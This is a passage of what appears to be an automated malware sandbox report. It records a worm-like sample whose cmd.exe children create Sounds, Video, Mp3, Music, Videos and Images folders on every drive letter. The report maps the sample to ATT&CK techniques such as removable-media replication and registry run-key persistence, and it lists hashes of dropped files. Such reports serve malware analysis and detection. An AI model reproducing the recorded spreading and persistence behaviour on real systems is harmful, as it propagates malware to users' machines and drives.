    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist o:\nul md o:\Sounds
        5⤵
        
        PID:2640
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist p:\nul md p:\Sounds
        5⤵
        
        PID:804
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist q:\nul md q:\Sounds
        5⤵
        
        PID:3052
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist r:\nul md r:\Sounds
        5⤵
        
        PID:1692
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist s:\nul md s:\Sounds
        5⤵
        
        PID:2632
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist t:\nul md t:\Sounds
        5⤵
        
        PID:1144
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist u:\nul md u:\Sounds
        5⤵
        
        PID:1648
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist v:\nul md v:\Sounds
        5⤵
        
        PID:1916
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist w:\nul md w:\Sounds
        5⤵
        
        PID:2784
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist x:\nul md x:\Sounds
        5⤵
        
        PID:2808
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist y:\nul md y:\Sounds
        5⤵
        
        PID:2692
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist z:\nul md z:\Sounds
        5⤵
        
        PID:2912
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist c:\nul md c:\Video
        5⤵
        
        PID:2788
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist d:\nul md d:\Video
        5⤵
        
        PID:2940
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist e:\nul md e:\Video
        5⤵
        
        PID:3028
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist f:\nul md f:\Video
        5⤵
        
        PID:3048
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist g:\nul md g:\Video
        5⤵
        
        PID:2244
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist h:\nul md h:\Video
        5⤵
        
        PID:2688
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist i:\nul md i:\Video
        5⤵
        
        PID:2884
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist j:\nul md j:\Video
        5⤵
        
        PID:2264
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist k:\nul md k:\Video
        5⤵
        
        PID:2196
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist l:\nul md l:\Video
        5⤵
        
        PID:816
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist m:\nul md m:\Video
        5⤵
        
        PID:2576
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist n:\nul md n:\Video
        5⤵
        
        PID:1316
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist o:\nul md o:\Video
        5⤵
        
        PID:1416
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist p:\nul md p:\Video
        5⤵
        
        PID:2140
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist q:\nul md q:\Video
        5⤵
        
        PID:1632
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist r:\nul md r:\Video
        5⤵
        
        PID:1640
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist s:\nul md s:\Video
        5⤵
        
        PID:2700
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist t:\nul md t:\Video
        5⤵
        
        PID:2748
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist u:\nul md u:\Video
        5⤵
        
        PID:2444
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist v:\nul md v:\Video
        5⤵
        
        PID:568
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist w:\nul md w:\Video
        5⤵
        
        PID:1556
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist x:\nul md x:\Video
        5⤵
        
        PID:2412
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist y:\nul md y:\Video
        5⤵
        
        PID:1872
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist z:\nul md z:\Video
        5⤵
        
        PID:992
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist c:\nul md c:\Mp3
        5⤵
        
        PID:1052
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist d:\nul md d:\Mp3
        5⤵
        
        PID:2008
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist e:\nul md e:\Mp3
        5⤵
        
        PID:2460
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist f:\nul md f:\Mp3
        5⤵
        
        PID:1800
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist g:\nul md g:\Mp3
        5⤵
        
        PID:2204
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist h:\nul md h:\Mp3
        5⤵
        
        PID:2424
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist i:\nul md i:\Mp3
        5⤵
        
        PID:2456
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist j:\nul md j:\Mp3
        5⤵
        
        PID:1004
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist k:\nul md k:\Mp3
        5⤵
        
        PID:2396
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist l:\nul md l:\Mp3
        5⤵
        
        PID:2292
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist m:\nul md m:\Mp3
        5⤵
        
        PID:1732
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist n:\nul md n:\Mp3
        5⤵
        
        PID:2496
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist o:\nul md o:\Mp3
        5⤵
        
        PID:2492
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist p:\nul md p:\Mp3
        5⤵
        
        PID:2120
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist q:\nul md q:\Mp3
        5⤵
        
        PID:2452
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist r:\nul md r:\Mp3
        5⤵
        
        PID:1256
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist s:\nul md s:\Mp3
        5⤵
        
        PID:1596
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist t:\nul md t:\Mp3
        5⤵
        
        PID:2180
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist u:\nul md u:\Mp3
        5⤵
        
        PID:2284
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist v:\nul md v:\Mp3
        5⤵
        
        PID:2056
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist w:\nul md w:\Mp3
        5⤵
        
        PID:1088
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist x:\nul md x:\Mp3
        5⤵
        
        PID:2136
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist y:\nul md y:\Mp3
        5⤵
        
        PID:2112
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist z:\nul md z:\Mp3
        5⤵
        
        PID:652
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist c:\nul md c:\Music
        5⤵
        
        PID:2168
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist d:\nul md d:\Music
        5⤵
        
        PID:1436
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist e:\nul md e:\Music
        5⤵
        
        PID:2476
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist f:\nul md f:\Music
        5⤵
        
        PID:1300
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist g:\nul md g:\Music
        5⤵
        
        PID:1560
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist h:\nul md h:\Music
        5⤵
        
        PID:276
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist i:\nul md i:\Music
        5⤵
        
        PID:2536
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist j:\nul md j:\Music
        5⤵
        
        PID:636
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist k:\nul md k:\Music
        5⤵
        
        PID:2508
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist l:\nul md l:\Music
        5⤵
        
        PID:112
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist m:\nul md m:\Music
        5⤵
        
        PID:1280
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist n:\nul md n:\Music
        5⤵
        
        PID:2976
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist o:\nul md o:\Music
        5⤵
        
        PID:876
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist p:\nul md p:\Music
        5⤵
        
        PID:2220
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist q:\nul md q:\Music
        5⤵
        
        PID:1804
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist r:\nul md r:\Music
        5⤵
        
        PID:988
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist s:\nul md s:\Music
        5⤵
        
        PID:564
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist t:\nul md t:\Music
        5⤵
        
        PID:1080
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist u:\nul md u:\Music
        5⤵
        
        PID:2984
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist v:\nul md v:\Music
        5⤵
        
        PID:2100
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist w:\nul md w:\Music
        5⤵
        
        PID:2360
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist x:\nul md x:\Music
        5⤵
        
        PID:1124
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist y:\nul md y:\Music
        5⤵
        
        PID:1712
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist z:\nul md z:\Music
        5⤵
        
        PID:1532
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist c:\nul md c:\Videos
        5⤵
        
        PID:1796
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist d:\nul md d:\Videos
        5⤵
        
        PID:1172
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist e:\nul md e:\Videos
        5⤵
        
        PID:880
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist f:\nul md f:\Videos
        5⤵
        
        PID:1964
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist g:\nul md g:\Videos
        5⤵
        
        PID:2676
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist h:\nul md h:\Videos
        5⤵
        
        PID:1652
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist i:\nul md i:\Videos
        5⤵
        
        PID:1668
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist j:\nul md j:\Videos
        5⤵
        
        PID:1636
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist k:\nul md k:\Videos
        5⤵
        
        PID:684
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist l:\nul md l:\Videos
        5⤵
        
        PID:552
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist m:\nul md m:\Videos
        5⤵
        
        PID:1748
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist n:\nul md n:\Videos
        5⤵
        
        PID:2368
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist o:\nul md o:\Videos
        5⤵
        
        PID:1900
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist p:\nul md p:\Videos
        5⤵
        
        PID:2256
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist q:\nul md q:\Videos
        5⤵
        
        PID:1104
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist r:\nul md r:\Videos
        5⤵
        
        PID:2260
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist s:\nul md s:\Videos
        5⤵
        
        PID:2148
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist t:\nul md t:\Videos
        5⤵
        
        PID:1000
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist u:\nul md u:\Videos
        5⤵
        
        PID:156
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist v:\nul md v:\Videos
        5⤵
        
        PID:1516
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist w:\nul md w:\Videos
        5⤵
        
        PID:2512
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist x:\nul md x:\Videos
        5⤵
        
        PID:2504
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist y:\nul md y:\Videos
        5⤵
        
        PID:788
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist z:\nul md z:\Videos
        5⤵
        
        PID:2540
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist c:\nul md c:\Images
        5⤵
        
        PID:1980
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist d:\nul md d:\Images
        5⤵
        
        PID:560
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist e:\nul md e:\Images
        5⤵
        
        PID:296
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist f:\nul md f:\Images
        5⤵
        
        PID:2340
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist g:\nul md g:\Images
        5⤵
        
        PID:2364
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist h:\nul md h:\Images
        5⤵
        
        PID:760
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist i:\nul md i:\Images
        5⤵
        
        PID:2956
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist j:\nul md j:\Images
        5⤵
        
        PID:1272
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist k:\nul md k:\Images
        5⤵
        
        PID:316
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist l:\nul md l:\Images
        5⤵
        
        PID:2352
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist m:\nul md m:\Images
        5⤵
        
        PID:2104
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist n:\nul md n:\Images
        5⤵
        
        PID:2124
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist o:\nul md o:\Images
        5⤵
        
        PID:764
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist p:\nul md p:\Images
        5⤵
        
        PID:1440
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist q:\nul md q:\Images
        5⤵
        
        PID:2276
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist r:\nul md r:\Images
        5⤵
        
        PID:2052
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist s:\nul md s:\Images
        5⤵
        
        PID:896

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

T1091

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Replication Through Removable Media

T1091

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\a57342.bat

Filesize
3KB

MD5
ea13fb665acfa6e75394b632fa1e6523

SHA1
09e4cfeb24b1aa352a21e4f4b7efb73219ec903b

SHA256
ae2122655697d9c1c77894b3bcdf6d870620614e96ef225920091e999dc6c1c6

SHA512
6279244a12ef5b2292325579530f18ccc1f5d790382da42375e05edef11a28d09512b07d83de0da910df395cb5795cae10a28129c085b0eea86fe758be3591ba

Download Submit
C:\Windows\Help\KGC.exe

Filesize
55KB

MD5
570e4111f5338efc3bab4a01af74fb19

SHA1
78f8a839d7e051cdbe07f0d80e60ed2ac0aceccd

SHA256
ea3b829623e1737dfb3989ee03dd81f9b7f736f2d076dfe7e013479c574fd2e2

SHA512
5c0d8c71e85c1098adfe345324a7eb7ede2e032ea9ebe824e0c36b5eee19908fcd2456c26acb4eae5ebff50c8c030afcc2ff22a3b2f21b4f5cc8ba62c75c5aad

Download Submit
C:\Windows\system\drver.cab.sys

Filesize
96B

MD5
dc22ce8abde6d13e2530b93ad0015fd9

SHA1
92ba8bf75edddd78c4d6976aa70e26fe6eb0b172

SHA256
336219dc0b99c63e07570db99050538f4eb44404fd49009b50502ae0682b2c78

SHA512
a3c12ae0fe0ba67f72201d8e7f40fb027e4291d66efc6e767c51d2ab64cb6ef872f284bd37687ecd7db3591d39fcb4777cefbbe46db4b77b3a9f1bfc628600a0

Download Submit
memory/916-304-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
memory/916-262-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
memory/916-145-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
memory/1580-143-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
memory/1580-2-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
memory/1580-124-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
memory/2012-104-0x0000000077150000-0x000000007724A000-memory.dmp

Filesize
1000KB

Download
memory/2012-103-0x0000000077250000-0x000000007736F000-memory.dmp

Filesize
1.1MB

Download
memory/2012-489-0x0000000077150000-0x000000007724A000-memory.dmp

Filesize
1000KB

Download
memory/2068-381-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
memory/2068-412-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
memory/2604-410-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
memory/2604-520-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
memory/2696-137-0x0000000000170000-0x000000000019A000-memory.dmp

Filesize
168KB

Download
memory/2856-626-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
memory/2896-521-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
memory/2896-625-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads